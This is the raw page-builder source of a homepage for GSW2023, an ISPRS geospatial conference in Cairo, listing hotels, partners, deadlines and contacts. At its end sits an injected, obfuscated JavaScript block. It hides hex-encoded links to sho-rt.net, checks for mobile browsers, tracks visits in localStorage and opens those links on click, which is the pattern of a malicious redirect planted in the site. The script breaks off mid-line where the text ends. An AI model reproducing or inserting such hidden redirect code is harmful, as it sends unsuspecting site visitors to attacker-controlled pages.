css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n<h3></h3>\r\n<p>&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<p><img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]</p>\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<p><img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][vc_column_text][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<ul>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_column_text][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n<p>[/ultimate_heading][/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s 